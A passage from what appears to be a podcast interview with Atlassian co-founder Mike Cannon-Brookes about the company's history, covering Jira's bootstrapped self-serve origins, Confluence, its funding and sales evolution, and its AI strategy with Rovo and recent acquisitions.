MCB: A little bit, but this is actually pre-Agile. So Jira comes out before Agile is even a thing. I think it was about two or three years before we had any version of marketing or feature sets that involved Agile. This was just a web-based bug tracker at the time. So the interesting evolution part of the company obviously is that it started as a bug tracker for software developers, it became an issue tracker for technology teams, and now it's like a business workflow for tens of millions of people every day across the world, most of whom have nothing to do with technology, so it's gone on its own evolution.
Would anything have been different if this was the plan from the beginning, or did it have to be this organic, "We're figuring it out as we go along as we're running away from Windows installations", sort of story?
MCB: I think, look, obviously, if we could choose to follow in our own footsteps, the Back to the Future skeptic in me would say it's gone pretty well, so I'd follow every single footstep I took.
(laughing) Yep, totally.
MCB: And that would've become the plan. But look, we had two hunches really, which both turned out to be radically correct. Now, I would say we were following waves or whatever else, but one was that the Internet would change software distribution, which sounds ridiculous now, and when I talk to graduates nowadays, I have to put them in the right time and place and say, "Look, when we started, software was distributed on a CD". BEA WebLogic was the bee's knees, and you used to have to get it on a CD if you were lucky. If not, someone would come and install it for you, and that's how software was distributed. We made that CD into a ZIP file and put it on the Internet for people to download. You didn't access it like a SaaS application, you literally downloaded it from our website.
Right. It's funny that when you first say that, it's like, "Oh, it's completely transformative"; well, you were an on-premises software story. But actually, no, there are several steps to getting to SaaS, one of which is just downloading software.
MCB: And we had people call us before they would download to check that we were real and stuff, and I'm like, "Why don't you just download the damn ZIP file?", and that also dates us. Well, maybe I'll get to the business model part, but the second innovation was that we thought open source would change software costs. So we had this big hunch; we were both writing a bunch of open source code at the time. Open source was a massive movement, especially in the Java space.
Embarrassingly, I actually wrote a book with some mates called Open Source Java Programming. It's still on Amazon and we sold a few thousand copies, I think, but I swore I'd never write a book again, it was a very painful experience.
Thank you, you're validating my life decisions.
MCB: Yeah. Open source did bring the cost of building software down radically. We were writing a very small layer, 5% of the code at best, on top of masses of amazing open source libraries, and we contributed to those libraries, but we could deliver an amazing experience for a very low cost. We learned a lot about pricing and packaging.
So what was the implication of that hunch though? Just that the market for developers would grow, and that would subsequently mean there was more software?
MCB: A little bit, that was the implication of the hunch. Largely for us, it was that the cost was going down. Pre-open source, you had to write everything, so if Jira was, back then, I don't know, a million lines of code, if you added all the open source libraries together, it was 25, 30, 40 million lines of code. Software was so big that it was so expensive, because you had to write all of that. Think of Windows: they wrote everything, the networking stack included; there were no libraries, there was no open source involved in the original versions, it was all written by Microsoft. So the cost of that was very high, and then you had to charge a lot of money. So we thought, look, if we could take all these amazing open source libraries, contribute back to them (we were a great open source citizen), and build a piece of proprietary software on top of them that solved customers' problems, we could deliver that really cheaply. In fact, the original versions of Jira were $800: unlimited users, unlimited use, with no lifespan. So it was just 800 bucks, one-time fee, forever. We learned a lot about pricing and packaging firstly, but secondly, it was very simple: our goal in the early days was that we had to sell one copy a week to stay alive, that was it. Some weeks, we'd sell two copies. $1,600 US would roll in and we'd be like, "Cool, we got a week off to survive", and then one copy a week became two and two became five and five became ten, and now it's hundreds of thousands.
Well, isn't the thing that you just didn't want to have a job? I love this part of the story, because when I started Stratechery, I had a job at Microsoft that paid, I think, $104,000 or something like that. I'm like, "I just want to make that, because I don't want to work for a corporation, so if I could just get to there, it'll be great".
MCB: We had exactly the same sets of goals. We had a few things: we wanted to make somewhere that we wanted to go to work. I wanted to get up every day and think, "I want to go to work", and weirdly, almost 24 years later, I love coming to work, so tick, achieved. We wanted to make it so we didn't have to wear a suit; neither of us really likes wearing suits at all (in fact, it's often a bit of an allergic reaction), so tick, don't turn up to work in a suit every day. And thirdly, most of our friends (this was right when IBM bought PwC, ironically), so out of the 30-odd kids in our class, maybe 10 went to IBM as consultants and 10 went to PwC, and then they all ended up going to the same shop, and their grad salary there was $47,600. So our goal for year one was to end the year making at least a grad salary and convince ourselves we weren't crazy, kind of thing, and we smashed that goal, so that was good, and that was that.
The Internet, the distribution part, is important, knowing your favorite topics. Tell me about that, along with the business model, because again, this goes back so far that I don't think people appreciate it: this entire idea of self-serve or bottoms-up selling, this is really where it all started.
MCB: Yes. And look, a few things. Firstly, if you come from Australia, we're an exporting nation. "We're built on the sheep's back" is a phrase; Australia's built on the sheep's back. What that really means is that because we were this colony originally, then a country on the far side of the world, anything we did to make money largely had to leave the country and go somewhere else. Originally, it was a struggle to find a product that could do that. "Built on the sheep's back" is because wool was the first product that could: you could put it on a wooden boat, because it wasn't very heavy, and you could ship it a long distance, because it kept really well, so we could make sheep's wool and make money as a country by shipping it back to Europe, and it could survive the journey, and so the country was built on the sheep's back. We are a massive exporting nation. Trump brings in his tariffs and we're the only country with a negative rate of return; we have a positive trade relationship with America and we're like, "Wait a second, why did we get taxed?". So obviously, whether it's rocks or technology, we build and export everything as a country.
So our mentality was, "Well, if we're going to make money, it's going to be overseas". That was the first thing: "Okay, it's going to be somewhere else, it's not going to be Australians buying our software", and the Internet allowed us to do this. We put up a shopfront, an early website, and people could come to our website, download our software, and then we just needed a way to get paid for it. The problem was that in order to do that, given the trust barriers of the Internet, we had to have a very low price and we had to have a fully installable offering. So we spent so much time on making it installable, on documentation, on "How would you get yourself up and running and try it?". The software, as we put it, had to sell itself. Our software had to be bought, not sold. We didn't have any salespeople; we couldn't travel to your office in Sweden or London and help you out with it. For $800, we couldn't have done that, and secondly, it didn't make any sense. So the evolution was, "Okay, the only possible path that we can go down is to figure out how to get people to do this". Now, it turns out that once you have figured out how to do that, it's an incredibly powerful motor, because you have lots of people coming, you have a very cheap piece of software for its relative performance, and you get people using it in all these big businesses all over the place. I would say 50% of the customers I go meet nowadays (I probably meet a handful of customers, a couple a day on average), many of those have been a customer for 20 years, 22 years, 23 years. How many companies have had customers for 23 years? I'm like, that's crazy, we're only 24 years old.
That's awesome.
MCB: And so they downloaded very early; they didn't download as all of the company, even though now all of them are customers.
Just one guy who's like, "I need a way to track my issues".
MCB: Exactly. It was some guy in a backroom who needed to track it. I know the Cisco origin story; that was literally a guy, he's still there, he's been there 22, 23 years, he's awesome.
And they started with just, "I just needed a way to manage my issues for 10 people", and now it's hundreds of thousands of people, the seats that we have there; it's kind of grown over time. How did we know that business model was working? Again, this dates us a lot. It didn't mean we didn't answer questions; we were big on customer service and helping people, and email was the way to do that. A bit of IRC back then; we had a channel you could log into and we'd help you. But the first customer: we used to walk into the office in the morning, and we had a fax machine with literally rolls of paper. So if you wanted to pay for this distributed software (this shows how old we are; there were no SSL keys, I heard you complaining about that era the other day, totally agree), you had to download a PDF off our website, which was pretty modern, that it was a PDF, fill in your credit card details, and fax it to us. That is how you paid when we started. So we would walk in in the morning and there'd be these rolls of paper on the ground, and you'd be like, "Ah, sweet, someone bought something". It became a weird dopamine drug for us.
The very first company was American Airlines…
MCB: About six months in, we came in one morning and there was a fax on the ground with $800 and a credit card number written on it, and we had never talked to American Airlines. They had never emailed us, they had never asked for customer service, they'd never gone on IRC, they had never talked to us in any way, shape or form.
Man, this thing could work, we just made $800 out of the air.
MCB: I mean, there was a lot of pre-work to get them there, but obviously that was kind of different. Then secondarily, as you wrote (I'm just trying to finish a very long answer here), we started Confluence in 2004, and those two became the dual engines, and both of those I think were probably major moments. I often say Confluence is the bigger moment, actually. The business model was kind of established; this is two years into the business. We made, I think, 800 grand in year one, $1.6 million in year two, maybe $5 million in year three, and $12 million in year four, if I remember the revenue numbers. So the thing was working really well.
You're the company that's the Microsoft heir in some respects, which is to say you took venture eventually but didn't really need to: just pure bottoms-up. You and Scott were able to keep a huge portion of the company because of that. It's an amazing story that is, I think, under-told in some respects.
MCB: Yeah, well, we actually did. I mean, we did and didn't. So the venture story is one of my favorites, because it describes how we think from first principles. Firstly, the first institutional capital we put on the balance sheet (I guess you could argue our initial, I don't know, 10 grand each was some money) was in the IPO. So in 2015, when we went public, that was the first capital that went into the business all time. We took two rounds of funding, one in 2010 and one in 2013, but both of those were to employees: the first was to the founders and the second was to a large number of employees who had bought in, so both of those companies bought ordinary stock.
Secondary shares basically, yeah.
MCB: They bought ordinary stock; there were no preferences, there was no anything, that was kind of the way it is.
And we love the Accel guys that invested. It's kind of funny, because their business model was wildly wrong; we now have their original spreadsheets and stuff. We're 15 years in, we know them really, really well. They wanted us to grow: I think we had to grow at 30% for two years, 20% the year after, and something like that, to double or triple their money, and at the time they put in $60 mil US. That was the largest investment I think Accel had ever made in anything in the software, digital kind of world, and it was this massive bet. It was a one-page term sheet for ordinary stock, so credit to those two partners who took a massive risk on us and had to fight their GC and everybody else to do this unusual funding round. And I think we did 50% growth the first year, and our CAGR since then is probably 40%.
Yeah, it worked out pretty well.
MCB: They did very well. I think their 2-3x was more like a 300x or something.
You mentioned the Confluence moment. Why was that a big deal? Usually the story is you have one product and you need to focus, and here you're two years old and you're launching a completely new product. Is that the aspect you're referring to?
MCB: Yes, I think it comes down to being bootstrapped. Look, we spent nine years convinced we were going to die every day; there was just such a mentality that this thing was all going to fall over and we'd better work harder and keep going. The Confluence moment was important because, I don't know exactly, but sometime around then we understood venture capital. Firstly, on the venture capital side, because they do relate to each other, there was no VC available in 2001 and 2002 in Australia. It was a nuclear winter, and we were two idiots with no credibility.
Right. You could barely get funded in San Francisco; you're not going to get funding in Sydney.
MCB: No, because in 2001 you weren't even finding San Francisco funding, because the whole dot-com boom had just happened; no one was getting funded anyway. We're in Australia and we have no credibility, so we didn't even bother. Literally, 2010, when we went to the Accel thing and talked to five VCs, was the first time we'd ever pitched the business. It was just not a thing. People don't understand; we used to say we were customer-funded when people would ask the also awkward question of, "Where's your funding come from?". We were like, "We're customer-funded", and they'd go, "Oh, okay".
Lifestyle business!
MCB: But we did understand venture capital. Massive readers: I have an army of technical books, books about technology and the industry and history and stuff from that magic era of airport bookstores. We read every issue of Red Herring and Industry Standard and Wired Magazine; I have just this huge library, so, voracious readers. One thing we understood about venture capital is they put portfolio theory on their side — and I'm a big fan of venture capital, I should say, I'm the chair of Australia's biggest VC fund and that's my other mate that I met in university, Niki Scevak. But we wanted portfolio theory on our side; we'd done finance and economics, we had one product, and that's highly risky if you're bootstrapped. So there was a little bit of the thinking that actually, if we have two products, our chances of total failure are less (one of them can fail and we'll be okay), and so we started a second product. Yes, arguably it was hard, but our first one was going all right, it was making, I don't know, five million bucks a year, and we had a handful of really awesome backpacker programmers.
And the early people, it's like a whole band of misfits that somehow made this thing work, and we were having a lot of fun, working really hard, and so we made another internal tool that became Confluence. Being adjacent but very different, selling to different audiences but having a lot in common (if you bought one, there was a good reason to have the other one, no matter which way you started), it became a really good symbiotic loop of these two engines that powered us for a very long time. So it was more a case of reducing our risk, actually, than anything else.
Wasn't it risky to be splitting your resources, or did that not even occur to you?
MCB: I don't think it occurred to us, no. It was more about splitting our risk, and we were doing pretty well. But it changed the business, because we moved from being the Jira company to a software company, and I say that's probably the least understood moment, because we had to learn not how to market Jira but how to market software, not how to build Jira but how to build software. So now we have 20, 25 apps in 5 different categories that sell to all sorts of different teams across a business, but we had to become a software company. Microsoft, I don't know if the analogy's really fair to them, to be honest, or fair to us; it seems massively over-glamorizing, and what they've achieved is amazing, I'm a huge fan of Microsoft. But the need to understand how to sell, in their case, Minecraft, SQL Server, Azure, AI: you have to understand the building, the creation of technology, the selling of technology, the marketing of technology at a generic level, and it really helped us generify the business. I think if we'd gone too much longer, everybody would've been on the Jira team and it would've been too hard to start a second thing; instead, we've always been a multi-product company.
You just mentioned selling a lot. When did you finally realize, or transition away from, just being self-serve to, "We've got to grow beyond this"? Was it almost like a pivot that came too late, because your identity was so wrapped up in "We're the self-serve company"?
MCB: Look, it's never been a pivot; I get asked this by investors all the time. I would say our go-to-market model and our process have kept evolving pretty much every year or two for 20 years, and I say evolving because we're very aware of the strengths of the model that we came up with, and very aware of what it takes to power that, and we've been very careful, when we've evolved, changed, or added to it, not to destroy the original one. So nowadays we have two amazing business models, which we call high-touch and low-touch. The low-touch model is literally the same thing as it's always been: hundreds of thousands of people show up every week and try our software, we want them to have a great experience trying the software, we want to spread it as widely as possible into as many enterprises as we can, and some of those will stick, some of those will get working, and we measure aggressively the rates of return and dollars and flows and funnels and everything else. There's a whole team whose job is to make sure that that's working, at now massive scale. But at the same time, what happened is that as customers got more and more Atlassian software deployed, they wanted a different relationship with us, they wanted a bigger relationship.
In those days, as soon as someone was spending $20 grand, we were like, "Oh man, maybe we should talk to these people"; nowadays, it's more like around $50 to $100 grand when we'll talk to you. So the lines have kept moving for different reasons, and we actually have online sales, then inside sales in between, then the sort of classical enterprise sales where someone gets on an airplane and travels to you. So it's just kept evolving. We talk about the IPO a lot; it's our 10-year anniversary coming up this month, and I'm off to New York next week to ring the bell and celebrate 10 years. When we went public, as an example, we had less than 10 companies paying a million dollars a year; now, 10 years on, we're well north of 500. That doesn't come without an amazing enterprise sales team, and teams that go out and help customers, and customer success, and all the trappings of a really top-flight enterprise sales organization, because for most of those customers (again, I think it's north of 85% of the Fortune 500 that are deep Atlassian customers) we've become a strategic partner. If we go down, rockets don't take off and banks shut down; it's of real critical importance to most of these customers.
How big is your business outside of directly working with developer teams? As I recall, part of the consulting thing was that you were wanting to do Jira for sales or Jira for all these different sorts of functions. Where and how did that evolve?
MCB: So it's been a continuum for a long time. Nowadays, less than half of our users are in technology teams, and probably a third of those are developers. So developers are a portion of our audience, and it's a very important point of wording: when I talk about this, all the engineers are like, "Hey, you don't care about us anymore", and I'm like, "No, that's not true". That business is a great business; it's just that the rest of our business has grown massively around it. There are not enough developers in the world for our business. Our fundamental value has always been, and it took us a decade to realize this: firstly, we don't solve technology problems, we never have. We've never had anything that's like, "I care what code you write, which language the code is in, what the code does". We solve collaboration and people problems; we always have solved people problems. Even Agile was a people problem. It's not a technology problem, actually, it's a people problem: "How do we organize a group of people to build a piece of technology that best meets the customer's needs and goes off track as little as possible?". That is a collaborative people problem; we've always solved people problems. Our value actually came because there are a lot of tools for technology teams, and we never wanted to be in the dev tools business. That's a road of bones; it's very hard to build sustainable competitive advantage in dev tools, the history shows this. There's just a different company every few years. Developers' tastes are fickle; our developers' tastes are fickle, and this is not me sledging developers at all. We have a massive R&D arm, and that group changes languages every couple of years, they change how they build software every couple of years, they're constantly moving on, they change our analytics tools and everything else, because they are tool builders and toolmakers. That makes sense, but that's a hard place to build a business. Interestingly topical today, so we'll see.
But the easier place to build a business in the long term was the level above that, which is the collaboration problems, which started as, "How do we get engineers, designers, product managers, business analysts to all be on the same page about what it is that they're building, and have a repeatable process for that?". It turned out that, as the world has become technology-driven, as we say, our customers are technology-driven organizations. If you're a large organization for whom technology is your key distinct advantage, and it doesn't matter whether you're making chips and databases, or rockets or cars, or financial services or insurance or healthcare (I would argue that for most of the businesses that are great, technology is their key competitive advantage), then you should be our customer, that is it. And what we help you do is help your technology teams and your business teams collaborate across that boundary, because that's actually the hardest boundary. Building great technology is one set of problems; making it work for your customers usually means, in different industries, a different amount of working with all sorts of business people, and that's what Jira did from the very start. Now, that's what our whole portfolio, in service management, in strategy, and in leadership teams, is about doing, at different scales and different amounts in different places.
Does it bug you when you get complaints on the Internet of, "Jira's so complicated", "Hard to use", blah, blah, blah? And are you saying that the problem space you're working in is not the single developer trying to track an issue, it's trying to herd a bunch of cats and get them all going in the same direction, and muddling through that is a lot more difficult than it seems?
MCB: It bothers me anytime people don't like our software, sure. We've worked for the last 20 years to make it better every day. We'll probably work for the next 20 years to make it better every day, and people will still probably be dissatisfied, and that is our fundamental core design challenge. There are a few reasons they say that. Firstly, the on-premise business model and the cloud shift is really important, because with the cloud shift we update the software, and with the on-premise business model we don't, so you would often be on older versions (customers would upgrade once a year or every two years or something), and we can't control that. Secondly, the challenge of Jira is that, at our core, we solve a whole lot of what we call structured and unstructured workflows. Confluence is an unstructured workflow; Jira's a very structured workflow. You have a set of steps, you have permissioning and restrictions, you have fields, you have what's happening in this process. The auditor will do something and pass it to the internal accounting team, the accounting team will do this and pass it to legal, legal will do this and pass it to these people. You're defining a workflow and you're having information flow back and forth, and a Jira work item is, as we call it, a human reference to work. That's the best description of what Jira is: work in the knowledge work era is this very ephemeral concept. Back to your development example: is the code the software? Is the idea the software? Are the designs in Figma the software? These are all parts of what it is, this virtual thing that we've built. What we track is a human reference to that, so someone can say it's a new admin console.
Cool: here's the design for the admin console, there's the spec for the admin console, there's the code for the admin console, here's where it's been tested, here's where it's deployed. Did customers like it? We need a reference to this thing that is otherwise spread across hundreds of systems and virtualized. Once you're building a workflow system, companies, ours included, love process, we love workflows, we love control, and that control usually comes with more data. "Hey, don't fill in these three fields, fill in these 50 fields", and they're all required for some reason, and our job is to say to customers, "Do you really need 50 fields?", because you're creating a user experience—
You're ruining it for us!
MCB: Your users are going to have to fill in all 50 fields, and it feels like that's going to take you a while. We have customers — I went back and checked, I think almost every single person you've interviewed on your podcast is a customer of ours. I don't know if it's 100%, but it's definitely north of 95% of the last 20 guests.
Stratechery is a customer of yours, so there you go.
MCB: Oh, really? Well, there you go. Thank you.
One of my engineers adores Jira, so I get the opposite angle from what I asked about.
MCB: That's right. So look, it's a challenge for sure, but at the same time, man, the value we've created, the business value, the number of customers that run on it. It's ironic, we talk about the AI era and all these other things: literally, no chips go out of any of the chip companies you love talking about without running through our software, every single one of them, soup to nuts.
So at what point did you realize that AI was going to impact you in a major way? Was there an "aha" moment, or has it just been in the air? Or was there a specific time you realized, "Look, this is going to completely change what we do"?
MCB: Again, I'm one of these — I've realized I've become the old man in the room. We've done machine learning for a long time in lots of ways because of our online business model, so I'd say we've done AI for a long time. Obviously, LLMs are what people refer to nowadays as AI, along with agents and these words that have been corrupted; the meaning changes in technology when it starts to mean something else. The launches of the various versions of ChatGPT were very instructive, obviously; they were a moment for everybody. The optimism: I would say we're massive AI optimists, and it is the best thing that's happened to our business in 25 years.
Why? Because people might look at you from the outside and say you're still characterized as — even though your business expanded far beyond developers — "Oh, you have a lot of developers". I'm skipping over the transition to the cloud just because we're running out of time, but it's an interesting story; you did announce you are finally ending the on-premises software, and I'm curious whether it was a sentimental moment to come to that decision. But people might look at you from the outside and say, "Oh, there's a company that's going to have a problem with AI. AI is going to replace developers, it's going to decrease seats. What are they going to do?"
MCB: There's a few ways to take that.
I'm trying to put it on a tee for you.
MCB: I think I know what you want to say. There's a few ways to look at it. Firstly, I think AI is a good example where people are very concrete about the negatives and the positives are upside. I think it's a huge force multiplier, personally, for human creativity, problem solving, all sorts of things; it's a massive positive for society.
That doesn’t mean there aren’t any negatives, but the net effect is really high. And we spend a lot of time, you hear it in the media talking about the job loss, the efficiency gains, whichever way you want to put it, that’s the thing. Well, that’s because it’s really concrete in a spreadsheet, “I can do this process with half as many people”, “Wow, look at that, that’s great”, what’s never written in the spreadsheet is all the new processes that get created, all the new ways of doing things, the quality of the output is going to be twice as high. If software costs half as much to write, I can either do it with half as many people, but core competitive forces, I would argue, in the economy mean I will need the same number of people, I would just need to do a better job of making higher quality technology. So our view on AI overall is an accelerant, not a replacement to everything we do, and just the next era of technology change is really positive. We’ve loved technology, we love the cloud, we love all the tech changes we’ve been through, mobile. Look, us as a business, we are in the game of knowledge work. We solve human problems, workflows, business processes, this is what we do. These largely revolve around text, or if it’s video nowadays, that can be reduced to text in various ways. LLMs allow us to understand that text in a massively deeper way than we ever have been, and the problems we solve aren’t going away. 20 years time, there’ll be groups of people trying to solve some sort of problem as a team and working on a project, and so these things aren’t going to go. They’re going to need to talk to each other and collaborate of what work’s going on and how it’s working, so the textual aspect of it has been amazing. The features we’ve been able to ship, we never could have built five years ago, it was literally impossible, so the ability to solve customer problems is so much higher than it ever has been. Secondly, our software is incredibly valuable at the core of these workflows, but it’s also incredibly promiscuous. What I mean by that is we have always been very highly interlinked with everything else. If it’s a sales team, there are links to Salesforce and customer records, there are links to internal systems, there are links to maybe features that need to be built, there are links to some content and document. So any Jira, Confluence, or Loom , you don’t record a Loom unless you’re talking about something, you don’t have a Jira issue without pointing to all sorts of different resources, whether that’s a GitHub or Figma, whether it’s Salesforce or Workday. That gives us a really unique knowledge, which we’ve turned into the teamwork graph, that actually started pre-AI, so the irony is the Teamwork Graph is about 6 years old. Well, it started with Confluence. This is the whole thing where you look backwards, and to your point, if you had just been the Jira company, but because from the very beginning, you mentioned Confluence was different but it was adjacent and you had to build the links and stuff together, and as you build all these different tools, because everyone wants to be this point of integration. And I wanted you to tell me about Rovo and this idea of being able to search across all your documents. Who gets permission to do that? It’s someone that’s already there, and you made the critical decision to be there back in 2004 or whatever it was. MCB: That’s true. 
Certainly back in 2004, and then in, I think, 2019, the Teamwork Graph starts, which is trying to take all of those links and turn them into a graph. The connectivity — two things linked to this Figma thing, five things linked to this customer record — okay, cool, that means something, so we built this graph. To be honest, it was a bit of a technology lark. We have a lot of these projects that are really cool, and we were like, "We'll be able to use this somehow and it's going to grow", and now it's a hundred billion objects and connections connecting all of a company's knowledge. It becomes the organizational memory nowadays, and context, and all these things; nobody knew in 2019 that that's what it was going to be, it just seemed we needed it for various process connections. That turns out to be, because it's got permissions and compliance and all of the enterprise stuff built in (which is incredibly difficult), the best resource to point AI at in various forms. You still have to be good at the AI parts to get the knowledge, the context for any area, so the Teamwork Graph is our data layer. It's not only the best kind of enterprise search engine for your content in a 10-blue-links kind of way of thinking; if you're chatting through your content, you still need all your organizational knowledge.
I actually, obviously, found your article. I was like, "Hey, what has Ben Thompson written about us?", and I asked Rovo in chat, and it came back to me with: he wrote this, that and the other, and pulled out some snippets. I'm like, "Tell me more, do you think we've hit that?". I literally got a report written by Rovo on your report as to whether it had been accurate: "Go look at the last 10 years with deep research and web search and come back and tell me, was he right or wrong?", and it gave me a really interesting analysis of whether you were right and wrong. It's like most AI things, it's like 90% correct, it's pretty good. It solved a lot of the problem, and I would not have done that work otherwise. I would have read it quickly, and I wasn't going to put an analyst on it internally to do this work, but I could send something to do work I never would've done.
Who's your competitor for this spot, for this Rovo position where you have all this context and you can actually search your company in a way that just wasn't possible previously?
MCB: Who are the competitors, you say?
Yeah, because everyone is claiming they're in this spot: "We can be the central place that you go to and we have visibility everywhere". Why is Atlassian the one that's going to win that space?
MCB: A few reasons why we will. "I think we have a great chance to be a great player" is maybe the easiest way to say it. Everybody loves this absolute-win position, but we don't believe that in enterprise technology you usually get these absolute wins; it's not quite the same as in the consumer world. We have a lot of business processes and workflows, millions every day, that run through us, and those are human collaboration workflows, so they are cool. The auditing team hands off to the accounting team, hands off to the tax team, whatever it is; sales workflows, marketing workflows, and they span lots of our applications and many others. If you're going to go and introduce agents, these autonomous AI-driven software programs, whatever you want to call an agent, you're going to put them into existing processes to make those processes either more efficient or more accurate.
When the human picks up a task, it’s got all the information they need because something’s gone out to find it, that is an incredibly powerful position, which is why we support our agents and everybody else’s. You can assign a Jira work item to a Cursor agent in terms of code, you can assign it to a Salesforce agent. If you have your agent technology choice, I don’t think you’re going to have one agent platform, I think you’re probably going to have multiples, there are going to be a handful of organizational knowledge graphs that are powerful enough to solve these problems across multiple tools, but we have access to all those tools. We already know the information to some level, and that becomes a very unique advantage. Do you see this as a way to expand even further how much of a company you cover? You started with developers, then you expand to adjacent teams, and you talk about it’s now just a fraction of your user base. Do you own entire companies or could you get there? It’s like, “Okay, we still have these teams over here that are not on Jira, but Rovo’s so good that we need to bring everyone in”? MCB: Look, again, it would be great. I think it is unrealistic, and we should say “Absolutely”, right? MCB: If [Salesforce CEO Marc] Benioff was here, he’d be like, “Absolutely, we’ll own the world”, we love him, that’s the way he is, I don’t think about it as owning a customer. Our mentality has always been — I always use the subway analogy versus we have some competitors, for example, that want to be the control tower, their whole thing is we’ll be the control tower, just give us control and we’ll go and control everybody else, we’ll move the planes around. I think in enterprise IT, that’s an unrealistic view. Every CIO has been sold this for decades, it doesn’t happen because the world changes too quickly. Our philosophy and our commitment to customers has always been we will be a great citizen on all sides, we will interact with all of the applications you need, the old ones and the new ones, and we will be a valuable point of exchange in your business workflows and processes, whether those are structured like in Jira, whether unstructured like in Loom or Talent or something else. The reason for that is you have lots of systems. We want to be a valuable station on your subway network, we don’t want to be at the end of one of the lines, we want to be one of the handful of hub stations that are about moving trains around, and that is the best way to get your knowledge moving in your organization, it’s the best way to deal with your processes. Therefore, we need to have amazing AI capabilities. We have a massive investment in R&D, we have thousands of people working on AI tooling at the moment, and we have a huge creation bent, which is one of the reasons I think — we’ve talked a bit about the data advantage we have, I think we have a huge design advantage, and I actually think design is one of the hardest parts of building great AI experiences because it’s real fundamental design for the first time. You had a great line, you did a podcast a couple of weeks ago that I’ll put a link to, but you mentioned basically, the customer should not need to understand the difference between deterministic and probabilistic in the context of design, that’s what you’re driving at here. MCB: They should not need to understand that, they should need to understand when outcomes, outputs may be wrong or may be creative. 
Again, you talk a lot about the fact that hallucination is the other side of creativity, right, you can’t have one without the other. Hallucinations are a miracle. We have computers making stuff up! MCB: Our job is to explain to a customer when that happens, so it’s like this might be something you want to do, and that requires a lot of design. We have a feature in Jira called Work Breakdown which is super popular, where I can take a Jira issue and say, “Make me a bunch of sub-issues, this task has to be broken into a set of steps”. I don’t believe in the magic button theory of AI, that I’ll just hit a button and it’ll do all the things; I believe deeply that the value from AI will come from human-AI collaboration in a loop. It’s me and the AI working back and forth. You talk about yourself and Daman quite a lot, and it’s you, Daman and ChatGPT working together, but it’s not like you ask one thing and it’s done. It’s an interaction, it’s a collaboration back and forth, and that’s going to happen everywhere. In Work Breakdown, what it does is it says, “Hey, based on these types of documents I’ve gone to find from your whole graph in Google Docs and Confluence, whatever, I think this piece breaks down into these, is that correct?”, and you go, “No, actually, that one doesn’t make any difference, these two are really good, you forgot about this document”, “Cool, let me go do that for you again”, and it comes back and says, “Is it these?”, “That’s closer”, and then you’re like, “That’s good enough, it’s 90% of what I need”, and then I go add the two that I need myself. That is a huge productivity boost but it’s not magically correct, and it requires a lot of design to tell people, “These are not the answers, these are possible answers, help us refine them and get better at it so that you get the 90% upside and the 10% downside is managed”. Are all these people pursuing these full agents that act on their own, are they just totally misguided? MCB: No, because I think, well, agents will take — there’s a snake oil sales thing going on, as there always is in any bubble, and the snake oil pitch is not wrong, it’s just chronologically challenged. (laughing) That’s so good. MCB: Well, customers are struggling. When I talk to customers every day, they’re like, “Is everyone else using these things to just magically transform their business, with this simple thing that took them five minutes and it’s replaced entire armies of people?”, and I’m like, “No, nobody’s doing that”. What they’re actually doing is taking business processes that are really important to their business and saying, “Okay, can I make this step better? This is highly error-prone. It’s compliance in a large organization, how do I make this part of the process better?”, and we’re like, “Oh, we can totally do that”, and they will replace small bits of lots of processes so that in Ship of Theseus style, five years from now, the process will look radically different. Occasionally, they are replacing entire processes, but this is the 1% case; what they’re actually doing is they have whole machines that are running and they’re trying to fix this cog and fix that cog, and that’s super valuable for them. That’s not a downside, that’s really, really valuable.
And often, it’s work they didn’t want to do, work that wasn’t getting done, or it wasn’t done at a high quality, so we’ve got to remember that. I say this quite a lot: people shouldn’t be afraid of AI taking their job, I fundamentally believe this, they should be afraid of someone who’s really good at AI taking their job. That’s actually what’s going to happen: someone is going to come along who, in a sales sense, is really good at using all these AI tools to give better customer outcomes or handle more customers at one time. Is this why you’re hiring so many young people? MCB: Yes, I guess so. Yes, they’re more AI-native, they come out understanding these tools and technologies. I find the biggest irony in universities is all these people who “cheat” their way through every assignment, I use cheat in quote marks, using ChatGPT to handle these assignments, and then they’re worried AI is going to take all these jobs. I’m like, “Wait, you literally took your own job of writing the assignment, but you’ve also trained yourself on how to use these tools to get the outcome required” — now one might argue the university degree should be different, but just like when Google came along and you could look up any fact, knowing facts became far less important than the ability to look it up. I still think AI, it doesn’t create anything, maybe slightly controversial, but I argue it synthesizes information, it’s really good at processing huge amounts of information, giving it back to you, changing its form, bringing it back. Humans are still the only source of fundamental knowledge creation. I point out one of the flaws in the one-person billion-dollar company argument: this will happen, but it’ll be an anomaly. That company doesn’t get created without that one person, so there’s not AI creating companies magically. It’s like, can a company eternally buy back its stock? No, because at some point, someone is going to own the final share. MCB: That’s right and I think this is missed, right? This is where we say it’s about unlocking creativity, and what we do for our customers is put Rovo and these amazing data capabilities that we have alongside all the enterprise compliance and data residency, and there’s a massive amount of making this work in the enterprise with trust and probity and security. It’s very difficult. And great design to say, “What do you hire us to do? How do you get these technology and business teams to work together? What workflows do you have in your projects and your service teams, and how can we make those workflows better with more data and make your teams more informed?” That will end up with us having more share of employees in a business that use our stuff every day. Awesome. You made two big acquisitions recently. The DX acquisition, I think, makes a ton of sense to me: measuring engineering productivity, particularly in the area of AI. What actual ROI are we getting on this? MCB: And how much money am I spending? Because I’m suddenly spending a lot of money, right? This is not cheap at all, I have huge bills. Internally, we use Rovo Dev, we use Claude Code, we use GitHub Copilot, we use Cursor, we have them available to all. We have a huge R&D — again, I think we’re still number one on the NASDAQ for R&D spending as a proportion of revenue. You can take that as a good thing in the AI era or a bad thing, everyone gets to choose their own view on that, but we’ve always been incredibly high on R&D spending since day one.
The bills that we pay though are very high, so DX is simply saying, “Okay, cool, how do I measure what I’m getting for that? Should I pay twice as much money because these bills are worthwhile, or is there a lot of it that’s actually just really fun and not actually leading to productivity gains?”. This is going to be a hard problem because there’s a lot of money on the line at the moment that people are paying for these tools, which is not without value, but measuring exactly what the value is is really, really hard, and that team’s done a phenomenal job. And we now have an Atlassian office in Salt Lake City, Utah, where I already spend a lot of time. Totally by coincidence, but it’s really nice. So that purchase, love it, makes a ton of sense. In perfect alignment with you. How does The Browser Company fit in? MCB: A lot of ways. So I have believed for a long time that browsers are broken. We’ve built browsers for an era of software that we don’t live in today. And I don’t, in my browser, have a bunch of tabs that represent webpages, I don’t have that. I have a bunch of tasks, I have a bunch of applications, I have a bunch of documents, and the browser was fundamentally never built to do that. That’s what Arc, the first product from The Browser Company, is about — if you don’t use Arc every single day, you should be; it’ll increase your productivity instantly because it’s built for knowledge workers and the way that they have to actually work every day and how they manage all of these tabs and tasks and flows, versus serving the New York Times or whatever. That is a browser built for knowledge workers, and there’s a lot more we can do in that era as software changes. Secondly, obviously AI has come along, and we now have chats and applications as an extra part of the browser experience, so I think we can 